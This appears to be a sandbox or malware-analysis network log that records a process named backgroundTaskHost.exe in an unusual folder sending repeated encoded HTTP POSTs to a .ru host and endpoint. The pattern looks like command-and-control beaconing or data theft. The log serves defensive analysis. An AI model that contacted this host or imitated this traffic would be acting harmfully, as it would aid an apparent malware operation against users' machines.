                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4431&min_rtt=1713&rtt_var=6080&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=62225&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 53 29 2d 20 55 36 06 24 12 29 07 3e 5a 25 20 05 06 3b 08 28 06 34 3c 30 03 38 32 0c 01 33 0d 28 58 2a 3c 24 54 37 1e 2f 1e 27 0a 2a 5d 06 12 3b 00 28 3c 31 00 26 38 2a 52 3e 0b 21 18 30 18 3e 5e 30 3d 0d 5a 28 02 32 07 25 3f 26 08 29 11 36 5a 3a 2a 2f 1e 38 05 30 1c 22 39 21 53 08 13 20 1e 26 0f 2b 10 2a 1e 22 01 31 0d 3e 04 30 39 34 0e 29 3b 34 50 25 3e 04 5d 2d 08 2b 11 3f 55 3b 00 39 3d 24 15 3e 3e 33 50 33 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$S)- U6$)>Z% ;(4<0823(X*<$T7/'*];(<1&8*R>!0>^0=Z(2%?&)6Z:*/80"9!S &+*"1>094);4P%>]-+?U;9=$>>3P3"\ #V=WL0
                                                                                          Jan 4, 2025 11:07:45.280566931 CET961INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ehHbaAOlBOZ8ROUlgkYUUhSX7ZDbPgXs%2FXXtsuflBLs%2B7S%2FSpRZIPV%2BKaY7bZAQ6cWIQFu9mww%2FK9AVLEnIq7%2FkmKfwoI%2Fo1k8jc8DMAu7K0DdstAwz1tj8DEZRIbW8Dwgj3YOP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c5b998343ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4431&min_rtt=1713&rtt_var=6080&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=62225&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 53 29 2d 20 55 36 06 24 12 29 07 3e 5a 25 20 05 06 3b 08 28 06 34 3c 30 03 38 32 0c 01 33 0d 28 58 2a 3c 24 54 37 1e 2f 1e 27 0a 2a 5d 06 12 3b 00 28 3c 31 00 26 38 2a 52 3e 0b 21 18 30 18 3e 5e 30 3d 0d 5a 28 02 32 07 25 3f 26 08 29 11 36 5a 3a 2a 2f 1e 38 05 30 1c 22 39 21 53 08 13 20 1e 26 0f 2b 10 2a 1e 22 01 31 0d 3e 04 30 39 34 0e 29 3b 34 50 25 3e 04 5d 2d 08 2b 11 3f 55 3b 00 39 3d 24 15 3e 3e 33 50 33 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$S)- U6$)>Z% ;(4<0823(X*<$T7/'*];(<1&8*R>!0>^0=Z(2%?&)6Z:*/80"9!S &+*"1>094);4P%>]-+?U;9=$>>3P3"\ #V=WL0
                                                                                          Jan 4, 2025 11:07:45.280644894 CET961INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ehHbaAOlBOZ8ROUlgkYUUhSX7ZDbPgXs%2FXXtsuflBLs%2B7S%2FSpRZIPV%2BKaY7bZAQ6cWIQFu9mww%2FK9AVLEnIq7%2FkmKfwoI%2Fo1k8jc8DMAu7K0DdstAwz1tj8DEZRIbW8Dwgj3YOP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c5b998343ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4431&min_rtt=1713&rtt_var=6080&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=62225&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 53 29 2d 20 55 36 06 24 12 29 07 3e 5a 25 20 05 06 3b 08 28 06 34 3c 30 03 38 32 0c 01 33 0d 28 58 2a 3c 24 54 37 1e 2f 1e 27 0a 2a 5d 06 12 3b 00 28 3c 31 00 26 38 2a 52 3e 0b 21 18 30 18 3e 5e 30 3d 0d 5a 28 02 32 07 25 3f 26 08 29 11 36 5a 3a 2a 2f 1e 38 05 30 1c 22 39 21 53 08 13 20 1e 26 0f 2b 10 2a 1e 22 01 31 0d 3e 04 30 39 34 0e 29 3b 34 50 25 3e 04 5d 2d 08 2b 11 3f 55 3b 00 39 3d 24 15 3e 3e 33 50 33 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$S)- U6$)>Z% ;(4<0823(X*<$T7/'*];(<1&8*R>!0>^0=Z(2%?&)6Z:*/80"9!S &+*"1>094);4P%>]-+?U;9=$>>3P3"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.449747104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:47.593194962 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:47.951421976 CET2520OUTData Raw: 54 5c 5e 51 55 53 5f 53 5c 5b 52 58 57 5b 58 5c 58 55 5a 59 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^QUS_S\[RXW[X\XUZYRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*)/B421/])2#>9\$7>.+/3*%7\ %=!Y#!Y,"
                                                                                          Jan 4, 2025 11:07:48.040193081 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:48.314719915 CET807INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:48 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPxyTa2Udl8TpPgfFE8sVzKXcM5IcW9k4tvMCIQzYEoKM9qBCzqQgU1z6gWx2cFuxXiX8se%2BIrIF1vFWL6X4tjLh4Z%2B%2Bw%2FdvCxJutJnS2drLP7mCEwCmmWoPsxKbrUIrWUD9alXX"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c74ffff4249-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2185&min_rtt=1714&rtt_var=1584&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=266326&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.449748104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:50.301980972 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:50.659266949 CET1844OUTData Raw: 51 5a 5e 55 50 5b 5a 5c 5c 5b 52 58 57 58 58 5d 58 55 5a 5f 52 55 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^UP[Z\\[RXWXX]XUZ_RUQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-(9 (2%07\))!!X0R >5??,*5 :^*+!Y#!Y,.
                                                                                          Jan 4, 2025 11:07:50.745023012 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:50.998327017 CET954INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbVjdjEsCZHMsmoJxf7V%2B450kTntFimFdORrzhNBM05TRGCdUWO9TBZWAHtbUSnl6YAl%2BzlF1gFb9TJdH7qIj6UFxM50HLo6TsOFUYw%2BqFnwv1lWbSyHQGZvHtGnPStBUlk2uhar"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c85eca2c3f8-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2331&min_rtt=1496&rtt_var=2231&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=178505&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 54 2b 2e 3c 50 21 2f 20 5d 2b 3d 2e 58 26 0e 2b 03 3b 31 01 5f 23 05 33 11 2e 22 0f 1f 33 0d 28 14 3d 59 2c 55 21 33 27 55 24 20 2a 5d 06 12 38 5b 3f 3c 26 11 31 3b 04 53 28 22 00 45 30 18 0b 00 24 03 34 03 2b 3f 31 5f 31 2c 17 50 3e 3c 22 5b 2d 03 27 1b 2c 3f 3c 1d 35 03 21 53 08 13 20 54 32 0f 28 0d 3e 09 2a 02 26 1d 3a 02 27 2a 24 0e 3d 38 24 52 25 2d 36 5d 2d 57 38 01 2b 30 28 59 3a 58 24 5f 2b 00 02 0f 24 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$T+.<P!/ ]+=.X&+;1_#3."3(=Y,U!3'U$ *]8[?<&1;S("E0$4+?1_1,P><"[-',?<5!S T2(>*&:'*$=8$R%-6]-W8+0(Y:X$_+$"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.449751104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:54.611726046 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:54.969275951 CET2520OUTData Raw: 54 51 5b 53 55 52 5a 57 5c 5b 52 58 57 5c 58 59 58 55 5a 5b 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ[SURZW\[RXW\XYXUZ[R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A=?7!%3')Z666&>W4-&Q?Z$?5+]#=">+!Y#!Y,>
                                                                                          Jan 4, 2025 11:07:55.066816092 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:55.235723019 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWdJbCHzNWFBkhWnf5gSzdHRQcSKuFuIDJmEgWTqaMICoPhibXauPuJ7%2F0G93EeU8NP29pm%2BTlAWQpRWcc9jfz56MIDuhYaPxPALmvXVMGGnLEYcTx5%2FLN7lMkAswJjWaI1B24sy"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ca0e8850f51-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3652&min_rtt=1733&rtt_var=4489&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=85425&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.449752104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:55.402632952 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:55.748358965 CET2520OUTData Raw: 54 5b 5e 54 55 52 5f 56 5c 5b 52 58 57 5f 58 5d 58 53 5a 5d 52 5d 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^TUR_V\[RXW_X]XSZ]R]Q^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*9?48Q2##=,["Z$$!>6R+'^*&3]4=9+;!Y#!Y,2
                                                                                          Jan 4, 2025 11:07:55.848474026 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:56.028518915 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kgk3GlDJFeX8HwZg39bfgq3IGcQywQReS1YK%2BSNIDI1K%2Bre%2BhxL3TzPhxW75PIKbADkMAO62WCg4RNYsEceDcFpniY9glROsEVevdOONcMoPao3f3ZJ99wgZFw7aPMPZLDF9STQm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ca5cd0743b7-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3411&min_rtt=1763&rtt_var=3958&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=97658&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.449753104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:56.020870924 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1832
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:56.373337984 CET1832OUTData Raw: 51 5a 5e 52 55 5d 5f 56 5c 5b 52 58 57 5a 58 52 58 53 5a 5f 52 52 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^RU]_V\[RXWZXRXSZ_RRQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D)*#C )U1U;^=<69[03S4.),'<@?]4%=!Y#!Y,
                                                                                          Jan 4, 2025 11:07:56.496519089 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:56.757910013 CET958INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXd5%2BL8DIU3m%2BukI7EUFHBlFfp0JEmKpfYB6UbEiaU9nLO9zRQgCxPOKHudMG8ycKDrwaTLi%2Fkb6xVauUeRQqis19tZAKd%2BHcaR9jVSqvjLsm6CG5iwF%2FDZUspsWdu0cT1De5OHh"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ca9bc3818f6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7796&min_rtt=1456&rtt_var=13226&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2149&delivery_rate=27982&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1f 28 2d 24 12 21 01 30 11 29 2d 3d 02 26 20 0d 06 3b 0f 23 5e 20 3f 3c 07 38 0b 3a 02 33 33 34 15 29 3c 3f 0c 23 1e 0d 55 27 20 2a 5d 06 12 3b 06 3f 3f 3e 5b 25 2b 32 52 29 1c 3d 18 27 25 3e 5e 27 03 37 5b 3c 3f 25 5f 26 3c 14 0f 29 01 04 5a 2e 29 24 47 2f 02 3c 51 36 39 21 53 08 13 20 57 25 21 3c 0d 3e 1e 21 12 25 20 21 11 30 03 2c 0d 2a 01 28 16 25 2e 2d 02 2e 0f 2b 5d 2b 23 38 5c 2d 3e 28 15 3e 2d 23 1f 27 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(-$!0)-=& ;#^ ?<8:334)<?#U' *];??>[%+2R)='%>^'7[<?%_&<)Z.)$G/<Q69!S W%!<>!% !0,*(%.-.+]+#8\->(>-#',"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.449754104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:56.434451103 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:56.779599905 CET2516OUTData Raw: 54 5d 5e 50 50 59 5a 52 5c 5b 52 58 57 5a 58 53 58 56 5a 52 52 55 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^PPYZR\[RXWZXSXVZRRUQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->93E"+:%3/=)6103Q!.Q+, <@? ->!Y#!Y,
                                                                                          Jan 4, 2025 11:07:56.905772924 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:57.074405909 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQlcTulie%2B6ntIUUNEEqtHDXBSumuZhDShfmnUjZmYg%2BY3DVJ06q1PxHWlmIpUpfKrrMmOcFszizkeHmqQj2cAGSbulqijBVp9%2F%2FpbwdG7pGvIKVQmCsPwEA8VF%2BDkwkys%2Bkb%2F3e"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cac5e8e0f7f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6431&min_rtt=1463&rtt_var=10486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=35425&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.449755104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:57.223012924 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:57.576494932 CET2520OUTData Raw: 54 51 5b 55 50 5c 5f 50 5c 5b 52 58 57 5c 58 5b 58 50 5a 5d 52 5c 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ[UP\_P\[RXW\X[XPZ]R\Q_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D=9"8%#,>-]53>(7)(<++$ 9);!Y#!Y,>
                                                                                          Jan 4, 2025 11:07:57.673707962 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:57.940002918 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fh0%2FrrV9HPkcOuJF3kSs0gE9%2B%2BiZpB0rhdhORYCYDnEhvEU9tEhccR5Bgd8YXsONX70gHv6zQniZGhCclzmq9oSpLQ%2BGhTlS1EEfLNw4wXA7nXclYfFS9GgWHW0GepNTIf3mwo2u"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cb12bf06a5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3837&min_rtt=1816&rtt_var=4723&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=81169&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.449757104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
